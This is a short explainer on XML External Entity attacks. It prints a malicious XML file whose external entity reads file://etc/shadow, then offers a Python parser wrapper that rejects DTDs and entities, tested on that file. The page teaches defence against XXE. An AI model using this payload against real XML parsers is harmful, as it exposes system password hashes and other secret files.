XML External Entities

He then hosts the malicious XML file on his own server as part of the trap.

The hacker executing his attack.
malicious.xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xrds [
<!ENTITY passwords SYSTEM "file://etc/shadow">
]>
<xrds>
  &passwords;
</xrds>
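
The defensive counterpart to malicious.xml, as an added example that is not part of the original page: a parser wrapper that refuses any document carrying a DOCTYPE, an entity declaration or an external entity reference before the data reaches the application. The names `parse_untrusted`, `ForbiddenXML` and `is_rejected` are hypothetical, and the benign sample is constructed.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """Raised when untrusted XML carries a DTD or entity construct."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    raise ForbiddenXML(f"DOCTYPE declaration not allowed: {name!r}")


def _reject_entity(name, is_param, value, base, sysid, pubid, notation):
    raise ForbiddenXML(f"entity declaration not allowed: {name!r}")


def _reject_external(context, base, sysid, pubid):
    raise ForbiddenXML(f"external entity reference not allowed: {sysid!r}")


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source, rejecting DTDs and entities."""
    # First pass: an expat parser whose handlers abort on the constructs
    # that XXE relies on. Nothing is resolved or fetched in this pass.
    guard = expat.ParserCreate()
    guard.StartDoctypeDeclHandler = _reject_doctype
    guard.EntityDeclHandler = _reject_entity
    guard.ExternalEntityRefHandler = _reject_external
    guard.Parse(data, True)
    # Second pass: only DTD-free documents are handed to the real parser.
    return ET.fromstring(data)


def is_rejected(data: bytes) -> bool:
    try:
        parse_untrusted(data)
    except ForbiddenXML:
        return True
    return False


# The page's malicious.xml, reproduced verbatim as test input.
MALICIOUS = (b'<?xml version="1.0" encoding="utf-8"?>\n<!DOCTYPE xrds [\n'
             b'<!ENTITY passwords SYSTEM "file://etc/shadow">\n]>\n'
             b'<xrds>\n  &passwords;\n</xrds>')
# Constructed benign document with the same root element and no DTD.
BENIGN = b'<?xml version="1.0" encoding="utf-8"?><xrds><service>x</service></xrds>'

if __name__ == "__main__":
    print("malicious rejected:", is_rejected(MALICIOUS))
    print("benign root tag:", parse_untrusted(BENIGN).tag)
```

Rejecting the DOCTYPE outright is stricter than disabling entity resolution alone, and it suits inputs that have no legitimate need for a DTD.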